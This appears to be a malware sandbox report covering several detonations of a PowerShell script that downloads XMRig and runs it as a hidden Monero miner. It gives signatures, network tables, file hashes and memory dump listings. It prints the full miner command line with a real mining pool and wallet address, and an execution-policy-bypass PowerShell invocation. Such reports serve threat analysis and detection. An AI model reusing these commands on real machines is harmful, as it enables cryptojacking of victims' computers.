| PID 2656 wrote to memory of 2952 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.173.189.20.in-addr.arpa | udp |
Files
memory/2656-0-0x00007FF95A033000-0x00007FF95A035000-memory.dmp
memory/2656-1-0x000002A327890000-0x000002A3278B2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vzmgrmov.zl4.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2656-11-0x00007FF95A030000-0x00007FF95AAF1000-memory.dmp
memory/2656-12-0x00007FF95A030000-0x00007FF95AAF1000-memory.dmp
memory/2656-14-0x00007FF95A030000-0x00007FF95AAF1000-memory.dmp
memory/2656-15-0x000002A327A20000-0x000002A327A32000-memory.dmp
memory/2656-16-0x000002A327A10000-0x000002A327A1A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2952-47-0x0000023110A40000-0x0000023110A60000-memory.dmp
memory/2952-48-0x0000023110CA0000-0x0000023110CC0000-memory.dmp
memory/2952-49-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2656-50-0x00007FF95A033000-0x00007FF95A035000-memory.dmp
memory/2656-51-0x00007FF95A030000-0x00007FF95AAF1000-memory.dmp
memory/2952-53-0x00000231A5150000-0x00000231A5170000-memory.dmp
memory/2952-52-0x0000023110CE0000-0x0000023110D00000-memory.dmp
memory/2952-54-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2656-56-0x00007FF95A030000-0x00007FF95AAF1000-memory.dmp
memory/2952-55-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-57-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-58-0x0000023110CE0000-0x0000023110D00000-memory.dmp
memory/2952-59-0x00000231A5150000-0x00000231A5170000-memory.dmp
memory/2952-60-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-61-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-62-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-63-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-64-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-65-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-66-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-67-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-68-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-69-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-70-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-71-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-72-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-73-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-74-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-75-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-76-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-77-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-78-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-79-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-80-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-81-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-82-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-83-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-84-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-85-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-86-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-87-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-88-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-89-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-90-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-91-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-92-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-93-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-94-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-95-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-96-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-97-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-98-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-99-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-100-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-101-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-102-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-103-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-104-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-105-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-106-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-107-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-108-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-109-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-110-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-111-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-112-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-113-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-114-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-115-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-116-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-117-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
memory/2952-118-0x00007FF79DB40000-0x00007FF79E773000-memory.dmp
Analysis: behavioral30
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 17:26
Platform
win10-20240404-en
Max time kernel
1793s
Max time network
1784s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1964 wrote to memory of 1820 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1964 wrote to memory of 1820 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.16.208.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
Files
memory/1964-4-0x00007FFFE8123000-0x00007FFFE8124000-memory.dmp
memory/1964-5-0x0000020E7F4E0000-0x0000020E7F502000-memory.dmp
memory/1964-8-0x00007FFFE8120000-0x00007FFFE8B0C000-memory.dmp
memory/1964-9-0x0000020E7F690000-0x0000020E7F706000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3atkrxiw.cru.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/1964-10-0x00007FFFE8120000-0x00007FFFE8B0C000-memory.dmp
memory/1964-25-0x00007FFFE8120000-0x00007FFFE8B0C000-memory.dmp
memory/1964-48-0x0000020E7F670000-0x0000020E7F682000-memory.dmp
memory/1964-61-0x0000020E7F650000-0x0000020E7F65A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1820-90-0x0000023E25710000-0x0000023E25730000-memory.dmp
memory/1820-91-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1964-92-0x00007FFFE8123000-0x00007FFFE8124000-memory.dmp
memory/1964-93-0x00007FFFE8120000-0x00007FFFE8B0C000-memory.dmp
memory/1820-94-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-95-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-96-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-97-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-98-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-99-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-100-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-101-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-102-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-103-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-104-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-105-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-106-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-107-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-108-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-109-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-110-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-111-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-112-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-113-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-114-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-115-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-116-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-117-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-118-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-119-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-120-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-121-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-122-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-123-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-124-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-125-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-126-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-127-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-128-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-129-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-130-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-131-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-132-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-133-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-134-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-135-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-136-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-137-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-138-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-139-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-140-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-141-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-142-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-143-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-144-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-145-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-146-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-147-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-148-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-149-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-150-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-151-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-152-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-153-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-154-0x00007FF784440000-0x00007FF785073000-memory.dmp
memory/1820-155-0x00007FF784440000-0x00007FF785073000-memory.dmp
Analysis: behavioral32
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 17:28
Platform
win11-20240508-en
Max time kernel
1789s
Max time network
1752s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4988 wrote to memory of 2624 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4988 wrote to memory of 2624 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 52.111.227.14:443 | tcp |
Files
memory/4988-0-0x00007FFBA8EB3000-0x00007FFBA8EB5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zg0bcvbe.yhv.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4988-9-0x000002B6E9C50000-0x000002B6E9C72000-memory.dmp
memory/4988-10-0x00007FFBA8EB0000-0x00007FFBA9972000-memory.dmp
memory/4988-11-0x00007FFBA8EB0000-0x00007FFBA9972000-memory.dmp
memory/4988-12-0x00007FFBA8EB0000-0x00007FFBA9972000-memory.dmp
memory/4988-14-0x000002B6E9E30000-0x000002B6E9E42000-memory.dmp
memory/4988-15-0x000002B6E9E20000-0x000002B6E9E2A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2624-46-0x0000018B5B740000-0x0000018B5B760000-memory.dmp
memory/2624-47-0x0000018B5B790000-0x0000018B5B7B0000-memory.dmp
memory/2624-48-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/4988-49-0x00007FFBA8EB3000-0x00007FFBA8EB5000-memory.dmp
memory/4988-50-0x00007FFBA8EB0000-0x00007FFBA9972000-memory.dmp
memory/2624-52-0x0000018B5D090000-0x0000018B5D0B0000-memory.dmp
memory/2624-51-0x0000018B5D070000-0x0000018B5D090000-memory.dmp
memory/2624-53-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/4988-54-0x00007FFBA8EB0000-0x00007FFBA9972000-memory.dmp
memory/2624-55-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/2624-56-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/2624-58-0x0000018B5D090000-0x0000018B5D0B0000-memory.dmp
memory/2624-57-0x0000018B5D070000-0x0000018B5D090000-memory.dmp
memory/2624-59-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
